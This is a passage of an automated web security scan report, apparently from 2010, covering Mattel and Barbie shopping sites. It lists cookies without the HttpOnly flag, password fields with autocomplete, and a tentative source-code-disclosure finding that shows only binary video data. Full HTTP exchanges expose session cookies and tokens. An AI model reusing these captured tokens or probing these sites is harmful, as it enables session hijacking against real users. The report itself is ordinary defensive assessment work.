GET /product/wishlist/wishlist.jsp HTTP/1.1
Host: shop.mattel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 23 Dec 2010 00:12:29 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Location: http://shop.mattel.com/coreg/index.jsp?step=register
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; expires=Tuesday, 10-Jan-2079 03:26:36 GMT; path=/
Content-Language: en
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 299

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://shop.mattel.com/coreg/index
...[SNIP]...

4.23. http://shop.mattel.com/search/controller.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.mattel.com
Path:   /search/controller.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /search/controller.jsp HTTP/1.1
Host: shop.mattel.com
Proxy-Connection: keep-alive
Referer: http://shop.mattel.com/product/index.jsp?productId=4199678
Cache-Control: max-age=0
Origin: http://shop.mattel.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; browser_id=118201181974; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; __utmz=40356960.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; __utma=40356960.338623011.1293084530.1293084530.1293084530.1; __utmc=40356960; __utmb=40356960.2.10.1293084530; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; __utmc=33623806; __utmb=33623806.2.10.1293084530; st_new=1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":4,"to":3.3,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":4,"s":true,"e":2}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}
Content-Length: 65

kw=video&search-button.x=0&search-button.y=0&search-button=Search

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 23 Dec 2010 00:14:21 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Location: http://shop.mattel.com/shop/index.jsp?categoryId=10811496&sr=1&origkw=video
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: rvdata=XR7e504f58165e4b1a0f4f1a175b120c09041d; expires=Tuesday, 10-Jan-2079 03:28:28 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 361

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://shop.mattel.com/shop/index.
...[SNIP]...

4.24. http://stats.clear-media.com/in.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.clear-media.com
Path:   /in.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /in.php?site_id=140415&res=1920x1200&lang=en&secure=0&href=%2Fshop%2Findex.jsp%3FcategoryId%3D10811496%26sr%3D1%26origkw%3Dvideo&title=Video%20Collection%20-%20Shop.Mattel.Com&ref=&jsuid=4039987430558971793&mime=js&x=0.3191598958801478 HTTP/1.1
Host: stats.clear-media.com
Proxy-Connection: keep-alive
Referer: http://shop.mattel.com/shop/index.jsp?categoryId=10811496&sr=1&origkw=video
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:14:24 GMT
Server: Apache
X-Powered-By: PHP/4.4.4-8+etch6
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: cluid=4039987430558971793; expires=Mon, 23 Dec 2030 00:14:24 GMT; path=/
P3P: CP='NOI DSP COR CUR OUR NID NOR'
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript
Content-Length: 0


4.25. http://tags.mediaforge.com/if/146  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.mediaforge.com
Path:   /if/146

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /if/146 HTTP/1.1
Host: tags.mediaforge.com
Proxy-Connection: keep-alive
Referer: http://shop.mattel.com/shop/index.jsp?categoryId=10811496&sr=1&origkw=video
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pID=|146,4199678; uID=CsF6Mk0Sky7AdwIeH6r8Ag==

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/plain
Content-Type: text/html
Date: Thu, 23 Dec 2010 00:14:27 GMT
P3P: policyref="/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
PRAGMA: no-cache
Server: nginx/0.7.65
Set-Cookie: pID=|146,4199678; expires=Sat, 22-Dec-2012 00:00:00 GMT; domain=.mediaforge.com; path=/
Content-Length: 1367
Connection: keep-alive

<html lang="en-US"><head> <meta charset="UTF-8"> <title></title></head><body> <div id="mf_div"></div> <script type="text/javascript"> var _mf_tag = { "init": function() { var id = 'mf_div';
...[SNIP]...

4.26. http://tags.mediaforge.com/if/146/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.mediaforge.com
Path:   /if/146/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /if/146/?prodID=4199678 HTTP/1.1
Host: tags.mediaforge.com
Proxy-Connection: keep-alive
Referer: http://shop.mattel.com/product/index.jsp?productId=4199678
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/plain
Content-Type: text/html
Date: Thu, 23 Dec 2010 00:09:18 GMT
P3P: policyref="/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
P3P: policyref="/p3p.xml", CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"
PRAGMA: no-cache
Server: nginx/0.7.65
Set-Cookie: pID=|146,4199678; expires=Sat, 22-Dec-2012 00:00:00 GMT; domain=.mediaforge.com; path=/
Set-Cookie: uID=CsF6Mk0Sky7AdwIeH6r6Ag==; expires=Fri, 23-Dec-11 00:09:18 GMT; domain=.mediaforge.com; path=/
Content-Length: 1367
Connection: keep-alive

<html lang="en-US"><head> <meta charset="UTF-8"> <title></title></head><body> <div id="mf_div"></div> <script type="text/javascript"> var _mf_tag = { "init": function() { var id = 'mf_div';
...[SNIP]...

4.27. http://www.barbie.com/videogirl/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barbie.com
Path:   /videogirl/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /videogirl/ HTTP/1.1
Host: www.barbie.com
Proxy-Connection: keep-alive
Referer: http://videogirlcontest.barbie.com/public/media/BarbieGalleryVote_safe.swf
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=wdgjdh55j4yeggemedanpan4; logcookie=2c7468ff-e3a8-450d-8fcc-30c2ae15b5a0; CanadaRedirect=yes; gn_country=US; flashDetected=true; __utmz=41301937.1293080671.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=41301937.532724375.1293080671.1293080671.1293080671.1; __utmc=41301937

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:01:01 GMT
Server: MII-WSD/1.4
Cache-Control: private
Pragma: no-cache
Expires: Thu, 23 Dec 2010 00:00:01 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: NSC_Cbscjf_Xfcgbsn=440af0aa3660;expires=Thu, 23-Dec-10 00:03:28 GMT;path=/
Via: HTTP/1.1 www.barbie.com (MII-WSD/1.4)
x-Message1: Powered by Mirror Image Internet (NC)
Content-Type: text/html; charset=utf-8
Content-Length: 25831
Via: 1.1 bfi107106 (MII-APC/1.6)


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
<link rel="shortcut icon" href="http://barbie.everythingg
...[SNIP]...

5. Password field with autocomplete enabled  previous  next
There are 2 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


5.1. https://shop.mattel.com/checkout/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://shop.mattel.com
Path:   /checkout/index.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /checkout/index.jsp?process=login HTTP/1.1
Host: shop.mattel.com
Connection: keep-alive
Referer: http://shop.mattel.com/product/index.jsp?productId=4199678
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; browser_id=118201181974; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; __utmz=40356960.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; __utma=40356960.338623011.1293084530.1293084530.1293084530.1; __utmc=40356960; __utmb=40356960.2.10.1293084530; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; __utmc=33623806; __utmb=33623806.2.10.1293084530; st_new=1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":2,"to":3,"c":"http://shop.mattel.com/product/index.jsp","lc":{"d0":{"v":2,"s":true}},"cd":0,"sd":0,"l":"en","i":-1}; fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; __g_c=w%3A1%7Cb%3A3%7Cr%3Ahttp%24*%24//shop.mattel.com/product/index.jsp%3FproductId%3D4199678_1___1293084613746%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:10:44 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 56514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Time
...[SNIP]...
<tr>
                   
                       <form name="returningCustomer" onsubmit="valLogin();return false;" action="/coreg/index.jsp" method="post">
<input type="hidden" name="step" VALUE="login">
...[SNIP]...
<br>
                       <input type="password" id="passwd" size="18" name="password" class="pagetext">
                       <br>
...[SNIP]...

5.2. https://shop.mattel.com/checkout/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://shop.mattel.com
Path:   /checkout/index.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /checkout/index.jsp?process=login HTTP/1.1
Host: shop.mattel.com
Connection: keep-alive
Referer: http://shop.mattel.com/product/index.jsp?productId=4199678
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; browser_id=118201181974; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; __utmz=40356960.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; __utma=40356960.338623011.1293084530.1293084530.1293084530.1; __utmc=40356960; __utmb=40356960.2.10.1293084530; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; __utmc=33623806; __utmb=33623806.2.10.1293084530; st_new=1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":2,"to":3,"c":"http://shop.mattel.com/product/index.jsp","lc":{"d0":{"v":2,"s":true}},"cd":0,"sd":0,"l":"en","i":-1}; fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; __g_c=w%3A1%7Cb%3A3%7Cr%3Ahttp%24*%24//shop.mattel.com/product/index.jsp%3FproductId%3D4199678_1___1293084613746%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1

Response

HTTP/1.1 200 OK
Date: Thu, 23 Dec 2010 00:10:44 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 56514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Time
...[SNIP]...
<form name="newCustomer" onsubmit="valSignUp();return false;" action="/agechecker/login.jsp" method="post">-->
                       <form name="newCustomer" onsubmit="valSignUp();return false;" action="/coreg/index.jsp" method="post">
                       <input type="hidden" name="step" value="signup">
...[SNIP]...
<br>
                           <input type="password" id="passwrd" size="18" name="newPassword" class="pagetext">
                           <br>
...[SNIP]...
<br>
                           <input type="password" id="confPasswrd" size="18" name="newPassword2" class="pagetext">
                           
   
                                                                                   <br>
...[SNIP]...

6. Source code disclosure  previous  next
There are 22 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.


6.1. http://mat.imageg.net/cms_widgets/38/44/384418_assets/cruncher_largeloop2.flv  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://mat.imageg.net
Path:   /cms_widgets/38/44/384418_assets/cruncher_largeloop2.flv

Issue detail

The application appears to disclose some server-side source code written in PHP and ASP.

Request

GET /cms_widgets/38/44/384418_assets/cruncher_largeloop2.flv HTTP/1.1
Host: mat.imageg.net
Proxy-Connection: keep-alive
Referer: http://mat.imageg.net/cms_widgets/38/44/384418_assets/VideosPage.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Tue, 21 Dec 2010 00:24:42 GMT
ETag: "2901fd-c2b0d-497e0a9ad0680"
Accept-Ranges: bytes
Content-Length: 797453
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/plain; charset=ISO-8859-1
Cache-Control: max-age=70775
Expires: Thu, 23 Dec 2010 19:54:02 GMT
Date: Thu, 23 Dec 2010 00:14:27 GMT
Connection: close

FLV.....    .................
onMetaData....
..duration.@..Q......width.@} .......height.@r.......videodatarate.@.........canSeekToEnd....videocodecid.@........audiodatarate.@X........audiocodecid.@...
...[SNIP]...
.{.U..8:E.. -.....ql.....z.eOV...A.B......aC.....45.WFd^}..8....m..~.M...C.]..6..aW....|V..{.'..Z....:Jq..%V).......=t...}.9Uv......h.=.|......%8!..N.P...NH4.C..Of......H.....E..xoE.t*......Z....!...;<%.3.4..L..5R.    ...r...c..H.+%
h.....(.."...c.n%2:.....e....l ......J...E4..Z...7......6..P.....t.p.n...w|j@|. ..,?..;W.'P...d...4.9.<.......^.y.v.....xd.gX..wSdq.S...~    N.Jo.k.#........U.....56\..q..
...y]{v...0%PY...f.t@b#.BP.g..........c...t..{k.dSyN.L*D...:..}p...`..U...q4!l.Y..d..|.I.4...tFJ..!..T;.~.N7^..a:s.........|M....`.,...{.UEG..G.....A(....].h..g.y.d.;...s....eG..;.....#...    ..^#Z&....Hi.x.......N.i8..(..}.....]W...kd.....X.e..?...s.U.n...~.....dRK..qX.3..#$G....V..d..\..w.{.=X.a...{ZyY..K.?..~YAO..u;X.....W...2`.v.BKK...U.....].0&.J!....$.d\.9 .9.l.........;.y0.7.@W..S........g.K.ff.6._.'...i..)P. N:..(
E..
..o>u].g5.Q..Dg.^%.jBOk.G..........I(.^.I[+0..dK).ngF?.!.n........hTe[D.+:.g.I.i.....!.p......Pr...l...,......i..8.....Y R..vg....J..@.'    ... .d.-0C9.".Y..s9K.V.5.D.....-c...A.1?X.m.o.L..............R.)5*.i.$k&..<......Mz k?X..4Y....J...xf`....^p....)?....9....c./.Y...6u.\....ab.7.c...|.q..C.[...}R.....8.......d..o`n.{_..C..........1..W..y.hV.^........n.k..w.l..+?...+..gAQ..0F.f._5...MdG?.....nF:ju.Zm....
..:..>...%...2.....p.E..#x.R.U}....$.
/..7..Q..G8.\Are.#..Z.zOUt).=;......
....BW
.......b.,..E.......L.._*.y_............3..pu...U..T...
.    (.z.^..P.>T3.5.....r{a..p..y?e..o.....91.>...d.[.i.!.....g.........j.D...V..dL
OZ"...k.....f...p.[......".J"b...r.C..qbj...C........j..j..5...../G....F..i..
.i.Ny...dY...`b[lW.........l..EK.|V....i..o.......%..%.SDM._gc.....J..._.&..T.liw...E_.}xt{...l.A.yR9..v..m...W,`Q.......TS....CA.W....<+.<..)4.#.A...!>F..T..l.J..<....J...K.......+.v......W....1.....KL.f............M...l?..D5.k\N.i<j#I.x.&..:....P.    ......#Y.V.<Q.u..<.SO.7.....FZ...`...=......V.h..L...rK..$.EK1..<Rk[h.x..#%...$.*....J'..$.......L.Y'?....>...y.r8l.k..w.....jt.......wh.6.....72:%`.{...f.1.!.. ..,.ic.L.i..x..O.....b....6u.P.....X..1...!....d.e.?.YITl....k...".sAO. ...+.....g..A...!:..7......{.u=X..}...I.    .....,.....f+A........UQ...].E...6{t.)6...k.p.    L........8[H...*.V7....wGg8.[ .G.D..Z..B..."..[.{sI0e=..k..u'b........NT..z...}..59.},bk...3..z_..u.K..a..v.|..H...&j...FYw.O....#..:p..........G...}.......Bt]2.#.ZE....4q.4.UlR[K(...r.....s..ybS.}g...&(t..g.y.4$R...."|.b.vAG.F..Q;..8....;D...*....0....%...D..r..T...Tu    .}....&..L..l=.S...O.L.}O.6    ....8Z.....=F.Q........3..C(....D..4...i.K.\.    
=..."..nuZ..Bs.../.g..J."....c...5..W@.N..
....Z}.V.    .~.........)"...m..uHW.i6...y.-..,o....|X.2
S%w...v.Y..qWI.    f..E9|...".5.8.Z.E9......I....:...F.....#....*..8..)>..c.V.......sj.q...7....6.*\.Y...}TN7..j..hE:...Y'...4....F.Nw...1...uN.....L..<...gu..(.Mb...Q...^..........'9.E%V.`.x..+.[Ky.u.qz8,.    h....m..^.O~...zu.{b.=f......6....:...J.u
oVG{6...L.p.....H...%.2[j#`..oE..2..&.$zLn......5'...Y.\EH.4"U|..&.2.....u....I;..<......M..F!o...^=./V..}@t.".."...O.R...#b..g.Z.....N..f....J:dl.C.Ui.06."....    .B..-&w)-.i.@....<.gS..*.m..N.h(......z....'..|..F..@.....OG.q.@w..`R..&va....o.....c...    :#.....b..\C..N..g.......u6..z........E.`E...(.+. ao/..T.}.^.bZ.9.....ES..v]......c........JA:........|N....c-..".?.......c.........t...........8#.......`Xa....&re...U...H.._g[...C........b..:..............I.RR>......Q_.q|...w.^.m..^..*...Y/I.Ys+1....+k..T@..a....6.....s.]2..r.&.#d."..$..%...zq...Jd.^...^#$$...{...v.
^.~..V...6.,.N.>w.H..=!.8._.sw..(...d!.....yJN...wx..D.....yn..7~..({.=7....../.e.6...#V5!...P....Z|.....+.w._..cs.../6P..
............^,@G.I...0.............\.|..z.....]0.Z:.5...Qu.[...>|.........v..)Ns.........I...s.:.T.....(.-.....Vz.B. $.C...AkT.;(..gSg.F.?..
_.7w.....G ..'..%...6..\.e4..%...<.7............!E.[J..G.u...02Oe.....E..P....p.......6.Lr&u...P./.R..&7A....*._..AQ`.Y...$g.]..{(...b7 ......g!E(0=....7...M.#.J...-.P......E.pP.X!..B3R.-%&X,J.ydd.o[....,.l..I.....h...z."..67./...........V.....I.#.....
..PQ.b.5.c.~......1@...8.....ny(........}D...[.}.=.s.P.......z....5c..N..&}.r..CIr5x...l.&....h(<!..j.-]....P.n[.....G.M..{/....g.Ga.}$x..X.% .........2.<.../.l.    ..9..&E.s$.....g.F.L!.......q.........d.N.<..;..m...:..M......... ...G..psq..}.J....H8.C,.s.a...|.IbVu...&.....{.8)./... ..i5.D...V*.2S.k....bE. d.....m..\.....m..l...=.K.*#.g....4.t.Lk@...b..e.(.Y........A9...af("...R..l`.b*B*.A,..!.e.....'..nk..Sz.\.k..&..r3...W....    .{.....G..8&>..#"7z.."o.L..J.#..4U...>...n*R...Aw4......eQE?...N7E.e.=g.@U.....m.#..X..c....w1. M......6..n(..Q.C..^Zr...u....<..<Q!Rf,...5.1.............>...m.....+;h...].6.b....[j.5 .hI.....A.S..).s .....w..i..L.H.......q....~.'.A...........N7.3..v4.uq.3..s?.4.!....@.W...`P.`...l.}.......v....SE.3zudk%.5.....l.&`.w..=.f.'7.s....*...4.%..O,z.%d:J....t.z......'..}F..ZF./v.UY{..=.......4(<.YP..D.......v....R...&.v...q.C)....;J..S..q?B.Ur^8,......W..r..$)..@......-....rk...=0.S.WnW..V......>zl.b..&..6......r.....<<c.z..?=..s.....q.zB,..h.....Cu2..........i.v.tM......w..oD...b.^.$.,?.qz.R..K..&..+..1.<.....(..|......C.bc`=PQ..M.H6.................#u.R.A|.x.. .......g<D...e.. .....(.....r..~.XB..j..R`u.z.Td.....cf3|]...^r.......f\..*..s.c..^..9...Z..m:U<90..d......,.Df7.&@.Qf.x..Yj.@.t5.../.9..D..`.hF..9...3.[.........._....:.....<.....s.9
.A.S......{...t$....`2..........G...b<l...s3.d..nR.A.....P.. `V3T`W..iL!0Z.O3.p.......6K;...:...... .J...D...XBa.y.......LpSw..q..a....a....It}w....$.7..%....9..m..b..\.Yf.|...C....-.y......    .q..P.5....B..v..'A....W.W...b....K8.a7q{R..
.nr...bdvW(@r....%.'..X.0M.#T...
1.....e..j.)..!.W..@...]N.`.6.......N..W...2B!e.@...2..%R.D.@..7M.k&....\...Z6..
